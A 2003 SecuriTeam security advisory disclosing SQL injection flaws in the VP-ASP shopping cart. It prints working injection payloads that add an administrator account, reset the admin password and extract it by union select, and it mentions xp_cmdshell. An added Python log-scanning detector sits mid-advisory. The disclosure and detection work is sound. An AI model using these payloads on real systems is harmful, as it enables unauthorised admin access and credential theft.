[NT] Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 12/01/03

    To: list@securiteam.com
    Date: 1 Dec 2003 17:46:41 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    Virtual Programming VP-ASP Shopping Cart Multiple SQL Injection Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    Virtual Programming <http://www.vpasp.com> VP-ASP is "a shopping cart
    application for e-commerce enabled sites. It is written in ASP, supports
    the following databases: Access, MSSQL, MySQL on Windows and MySQL on
    UNIX".

    VP-ASP suffers from SQL injection vulnerabilities, which may allow an
    attacker in some cases to gain administrative access to the installed
    VP-ASP Shopping Cart software or execute arbitrary commands on a target's
    system.

    DETAILS

    Vulnerability 1: SQL Injection Vulnerability in 'shopsearch.asp' Script
    An SQL injection vulnerability has been found in the shopsearch.asp
    script. User-supplied input is not filtered before being used in a SQL
    query, so the query can be modified with malformed input.
    Exploitation of the vulnerability allows a remote attacker to insert a new
    user with administrative privileges. A more sophisticated exploitation
    would allow a remote attacker to execute arbitrary commands on the target's
    system (via the MSSQL xp_cmdshell extended stored procedure, for example).

    Exploit:
    Platform: Win32/MSSQL

    Posting this data to shopsearch.asp creates a new administrative account:
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6

    Posting this data to shopsearch.asp changes the admin password:
    Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    Vulnerability 2: SQL Injection Vulnerability in 'shopdisplayproducts.asp' Script
    An SQL injection vulnerability has been found in the
    shopdisplayproducts.asp script. Exploitation of the vulnerability allows a
    remote attacker to read any information from the database.

    Exploit:
    Platform: Win32/MSSQL
    http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--

    Changing the value at the end of the request
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    ..

    and looking through the HTTP response from the VP-ASP web server, an
    attacker can find the administrator password.
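    Detection logic for the two request patterns described above, written as an added example that is not part of the advisory or of VP-ASP: it scans W3C-format IIS log lines and raw request bodies for the union-based and stacked-query indicators the advisory shows. The log field order, client addresses and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicators for the injection patterns shown in the advisory, matched against
# the URL-decoded, lower-cased query string or POST body of a request.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "stacked_insert": re.compile(r"\)\s*;\s*insert\s+into\b"),
    "stacked_update": re.compile(r"\)\s*;\s*update\s+\w+\s+set\b"),
    "user_table": re.compile(r"\btbluser\b"),
    "comment_tail": re.compile(r"--(&|\s*$)"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
}
# Scripts named in the advisory; requests for anything else are ignored.
WATCHED_SCRIPTS = ("/shopsearch.asp", "/shopdisplayproducts.asp")

def scan_query(raw):
    """Names of all indicators found in one URL-encoded query string or body."""
    decoded = unquote_plus(raw).lower()
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_iis_line(line):
    """(client_ip, uri_stem, hits) for a suspicious W3C-format IIS log line,
    or None when the line is a header, an unwatched script, or clean."""
    if line.startswith("#"):
        return None
    fields = line.split()
    # Assumed field order, as in the #Fields header of the constructed log:
    # date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
    if len(fields) < 10:
        return None
    stem, query, client_ip = fields[4], fields[5], fields[8]
    if not stem.lower().endswith(WATCHED_SCRIPTS):
        return None
    hits = scan_query(query)
    return (client_ip, stem, hits) if hits else None

def scan_iis_log(lines):
    return [r for r in (scan_iis_line(l) for l in lines) if r]

# Constructed sample log (not real traffic): a benign category view, a benign
# search containing an apostrophe, and the union-based request from the advisory.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2003-12-01 10:00:01 10.0.0.5 GET /vpasp/shopdisplayproducts.asp cat=5 80 - 192.0.2.10 200
2003-12-01 10:00:07 10.0.0.5 GET /vpasp/shopsearch.asp Keyword=O'Reilly&category=5 80 - 192.0.2.10 200
2003-12-01 10:01:13 10.0.0.5 GET /vpasp/shopdisplayproducts.asp cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- 80 - 198.51.100.7 200
""".splitlines()
```

    IIS does not record POST bodies, so the shopsearch.asp vector (vulnerability 1) is only visible to scan_query when request bodies are captured by a reverse proxy or WAF.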

    Solution:
    S-Quadra alerted the VP-ASP development team to this issue on 28th November
    2003. Security fixes from the VP-ASP development team are available at:
    http://www.vpasp.com/virtprog/info/faq_securityfixes.htm

    ADDITIONAL INFORMATION

    The original advisory is available from:
    http://www.s-quadra.com/advisories/Adv-20031128.txt

    The information has been provided by Nick Gudov (cipher@s-quadra.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

